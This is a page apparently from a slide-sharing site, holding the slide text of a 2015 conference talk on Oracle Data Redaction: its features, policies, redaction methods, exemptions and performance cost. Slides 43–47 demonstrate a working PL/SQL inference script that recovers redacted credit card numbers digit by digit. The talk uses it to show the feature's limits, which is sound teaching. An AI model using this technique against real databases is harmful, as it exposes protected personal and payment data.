Oracle Database 12c - Novas Características para DBAs e DesenvolvedoresOracle Database 12c - Novas Características para DBAs e Desenvolvedores
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
Alex Zaballa
 
Oracle Data Redaction - EOUC
Oracle Data Redaction - EOUCOracle Data Redaction - EOUC
Oracle Data Redaction - EOUC
Alex Zaballa
 
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...
Alex Zaballa
 

More from Alex Zaballa (20)

Migrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCIMigrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCI
 
Exploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle CloudExploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle Cloud
 
Moving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle CloudMoving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle Cloud
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
 
DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUDLET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
 
Moving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle CloudMoving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle Cloud
 
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
 
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should KnowOTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
 
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
 
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
 
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
 
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
 
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
Oracle Database 12c - Novas Características para DBAs e DesenvolvedoresOracle Database 12c - Novas Características para DBAs e Desenvolvedores
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
 
Oracle Data Redaction - EOUC
Oracle Data Redaction - EOUCOracle Data Redaction - EOUC
Oracle Data Redaction - EOUC
 
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores - GUO...
 

Recently uploaded

UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
Zilliz
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 

Recently uploaded (20)

UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 

Oracle Data redaction - GUOB - OTN TOUR LA - 2015

  • 1. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Oracle Data Redaction Presented by: Alex Zaballa, Oracle DBA
  • 2. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Alex Zaballa http://alexzaballa.blogspot.com/ @alexzaballa 145 and counting…
  • 3. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 4. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Worked 8 years for the Ministry of Finance March - 2007 until March - 2015
  • 5. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 6. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 7. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP ORACLE ACE PROGRAM http://www.oracle.com/technetwork/community/oracle-ace/index.html
  • 8. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 9. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP https://community.oracle.com/community/other-languages/portuguese
  • 10. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Oracle Data Redaction
  • 11. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Data Redaction • One of the new features introduced in Oracle Database 12c • Part of the Advanced Security option • Enables the protection of data shown to the user in real time, without requiring changes to the application
  • 12. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Data Redaction • This new feature has been backported to Oracle Database 11.2.0.4
  • 13. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP • Applies protection at query execution time • The stored data remain unchanged Redaction takes place immediately preceding the return of selected data and only at the top level of a SELECT list • It is not an operation shown in the execution plan
  • 14. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Policy SELECT rep.object_name as "OBJECT", rep.policy_name, rep.expression, rep.enable, rec.column_name as "COLUMN", rec.function_type FROM redaction_policies rep, redaction_columns rec WHERE rep.object_owner = rec.object_owner AND rep.object_name = rec.object_name; OBJECT POLICY_NAME EXPRESSION ENABLE COLUMN FUNCTION_TYPE ------ ----------- ------------------------------------------------ ------ ------ -------------- EMP SCOTT_EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY FULL REDACTION
  • 15. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP SQL> EXPLAIN PLAN FOR SELECT * FROM EMP; SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL')); As SCOTT with the MGR role: -------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | -------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | | 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | -------------------------------------------------------------------------- As SCOTT without the MGR role: -------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | -------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | | 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | --------------------------------------------------------------------------
  • 16. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Not to be confused with Oracle Data Masking With Oracle Data Masking, the data is processed using masked shapes and this updated data is stored in new data blocks. For this reason, Data Masking is more suitable for non-production environments. ** Oracle Data Masking is available only with Enterprise Edition database and it requires licensing of Advanced Security.
  • 17. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Below are some other features that already existed to help making the data more secure: •Virtual Private Database (VPD) - Allows control access on both row and column levels by dynamically adding a predicate to SQL statements issued against the database. •Oracle Label Security – Allows you to add user-defined values ​​to table records combining it with VPD to allow fine control of who sees what​​. •Database Vault – Data Redaction does not prevent privileged users (such as DBAs) from having access to the data being protected. To solve this, you can make use of Database Vault.
  • 18. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Planning on Oracle Data Redaction Policy 1. Ensure that you have been granted the EXECUTE privilege on the DBMS_REDACT PL/SQL package. 2. Determine the data type of the table or view column that you want to redact. 3. Ensure that this column is not used in an Oracle Virtual Private Database (VPD) row filtering condition. That is, it must not be part of the VPD predicate generated by the VPD policy function. 4. Decide on the type of redaction that you want to perform: full, random, partial, regular expressions, or none. 5. Decide which users to apply the Data Redaction policy to. 6. Based on this information, create the Data Redaction policy by using the DBMS_REDACT.ADD_POLICY procedure. 7. Configure the policy to have additional columns to be redacted
  • 19. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Conditional Redaction Examples •User Environment expression => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''PSMITH''' •Database Role expression => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''SUPERVISOR'') = ''FALSE''' •Oracle Label Security Label Dominance expression => 'OLS_LABEL_DOMINATES (''hr_ols_pol'',''hs'') = 0' •Application Express Session States expression => 'V(''APP_USER'') != ''mavis@example.com'' or V(''APP_USER'') is null'
  • 20. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 21. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP DBMS_REDACT • DBMS_REDACT.ALTER_POLICY Allows changes to existing policies. • DBMS_REDACT.DISABLE_POLICY Disables an existing policy. • DBMS_REDACT.DROP_POLICY Drop an existing policy. • DBMS_REDACT.ENABLE_POLICY Enables an existing policy. • DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES Change the default return value for full redaction. You must restart the database to take effect.
  • 22. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 23. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Redaction Methods • Full redaction • Partial redaction • Regular expressions • Random redaction • No redaction
  • 24. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP FULL Data Redaction •Character Data Types The output text is a single space •Number Data Types The output text is a zero •Date-Time Data Types The output text is set to the first day of January, 2001
  • 25. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP RANDOM Data Redaction •CHAR Data Types Redacted in same character set and byte length as the column definition •Number Data Types Redacted in same character set and the length is limited based on the length of the actual data •Date-Time Data Types Redacted as random dates that are always different from those of the actual data
  • 26. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 27. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Column data types NUMBER, BINARY_FLOAT, BINARY_DOUBLE, CHAR, VARCHAR2, NCHAR, NVARCHAR2, DATE, TIMESTAMP, TIMESTAMP WITH TIME ZONE, BLOB, CLOB, and NCLOB
  • 28. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 29. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 30. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 31. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 32. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 33. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 34. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 35. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 36. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Operational Activities - No Redaction •Backup and Restore •Import and Export •Patching and Upgrades •Replication •Users SYS and SYSTEM automatically have the EXEMPT REDACTION POLICY system privilege •Data Redaction is not enforced for users connected as SYSDBA
  • 37. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Data Redaction and Data Pump ORA-28081: Insufficient privileges - the command references a redacted object Use the EXEMPT REDACTION POLICY system privilege in these cases. However, use it with caution. Note that the role DATAPUMP_EXP_FULL_DATABASE includes the EXEMPT REDACTION POLICY system privilege
  • 38. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP If you try to CREATE TABLE ... AS SELECT (CTAS) against a redacted table you get the following error message: ORA- 28081: Insufficient privileges - the command references a redacted object. In order to perform a CREATE TABLE AS SELECT operation from a table protected by an active redaction policy, the user must have privileges to see the actual data on the source table Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege. Data Redaction and CTAS
  • 39. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Redacted Columns and GROUP BY SQL Expressions Redacted Columns included in SQL expressions on a GROUP BY clause will fail as follows: SQL> select * from emp; EMP_NO NAME SALARY ---------- ---------------------------------------- ---------- 1 Daniel 702 2 Juca 607 3 Manuel 314 SQL> select (salary*1.10) from emp group by (salary*1.10); select (salary*1.10) from emp group by (salary*1.10) * ERROR at line 1: ORA-00979: not a GROUP BY expression
  • 40. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Redacted Columns and Virtual Columns SQL> alter table hr.employees add sal number as (salary*1.10) virtual; alter table hr.employees add sal number as (salary*1.10) virtual * ERROR at line 1: ORA-28083: A redacted column was referenced in a virtual column expression.
  • 41. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP •Columns from MVIEWS as well as regular VIEWS can be redacted Data Redaction and Views
  • 42. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Overhead • It could reach up to 10% of performance impact when using complex Regular Expressions • Between 2-3% performance impact using other redaction methods
  • 43. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP •Never to be considered as a way to protect data from anyone with SQL access to the database •Extremely easy to hack once you have access to SQL •It was never designed to protect data from the attack we will demonstrate Hacking
  • 44. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Let’s consider the following Redaction Policy: BEGIN DBMS_REDACT.ADD_POLICY (OBJECT_SCHEMA => 'DDAMEDA', object_name => 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO', expression => 'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') = ''WATCHER'''); DBMS_REDACT.ALTER_POLICY (OBJECT_SCHEMA => 'DDAMEDA', object_name => 'CUSTOMERS', policy_name => 'CREDIT_CARD_NO', action => DBMS_REDACT.ADD_COLUMN, column_name => '"CREDITCARD_NO"', function_type => DBMS_REDACT.REGEXP , regexp_pattern => .*(dddd)$,regexp_replace_string => ************1,regexp_position => 1,regexp_occurrence => 1,regexp_match_parameter => i); Hacking - Finding Actual Values by Inference
  • 45. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP SQL> SHOW USER USER is "WATCHER“ SQL> SELECT * FROM customers; CUSTOMER_ID NAME CREDITCARD_NO ----------- -------------------- ---------------- 1 Daniel Da Meda ************4368 2 Alex Zaballa ************5211 3 Antonio Mateus ************5005 Hacking - Finding Actual Values by Inference
  • 46. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP SET TIMING ON SET SERVEROUTPUT ON DECLARE vcreditcard_no CUSTOMERS.creditcard_no%TYPE; vcustomer_name CUSTOMERS.name%TYPE; BEGIN FOR a in 1..19 LOOP IF a NOT IN (5,10,15) THEN FOR b in 0..9 LOOP BEGIN SELECT name INTO vcustomer_name FROM CUSTOMERS WHERE customer_id=2 AND SUBSTR(creditcard_no,a,1) = b; vcreditcard_no:=vcreditcard_no||b; EXCEPTION WHEN NO_DATA_FOUND THEN NULL; END; END LOOP; ELSE vcreditcard_no:=vcreditcard_no||'-'; END IF; END LOOP; DBMS_OUTPUT.PUT_LINE('Credit Card Number for '||vcustomer_name||' is: '||vcreditcard_no); END; / Hacking - Finding Actual Values by Inference
  • 47. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP vi get_creditcard.sql [oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014 Copyright (c) 1982, 2014, Oracle. All rights reserved. Connected to: Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production With the Partitioning, Automatic Storage Management, OLAP, Advanced Analytics and Real Application Testing options SQL> @get_creditcard.sql Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211 PL/SQL procedure successfully completed. Elapsed: 00:00:00.03 Hacking - Finding Actual Values by Inference
  • 48. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 49. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP
  • 50. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Time for SQLcl ?
  • 51. 08 de Agosto de 2015 no Hotel Blue Tree Morumbi, São Paulo - SP Thank You

Editor's Notes

  1. For me, oracle should provide security features for free, specially for enterprise edition But it is just my opinion.
  2. The next slide will show that the execution plans do not change between queries which return redacted data and queries that do not return redacted data.
  3. The above slide shows that a policy named SCOTT_EMP exists for a table called EMP. The policy is enabled and it is supposed to redact the salary column for sessions that do not have the MGR role.
  4. This slide makes it clear that there is no distinction between execution plans of the same statement with or without data redaction taking place. The redaction magic must happen right after the TOP level operation of the execution plan and before the data is sent to the client.
  5. Here a some examples of conditional artefacts that can be used to drive redaction policies
  6. Import and Export: Data Redaction policies associated with tables and views are included in the export and import operation. Therefore, the policies are enabled and the data is redacted when users query the objects in the imported database SYSTEM has the EXP_FULL_DATABASE role, which includes the EXEMPT REDACTION POLICY system privilege.
  7. Alternatively, you can perform the export with a user that is exempt from the redaction policy. Namely, a user that doesn't fall under the redaction criteria
  8. Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege.
  9. The above example shows a table emp that has a redaction policy enabled on column SALARY.
  10. The above example shows a table emp that has a redaction policy enabled on column SALARY.
  11. Inline Views SELECT XYZ … AS SELECT A… AS SELECT B… AS SELECT C…, SELECT XYZ is redacted first, followed by AS SELECT A, then AS SELECT B, and so on. AS SELECT C is redacted last.
  12. According to our tests it could reach up to 10% of performance impact when using complex RegEx and between 2-3% performance impact using other redaction methods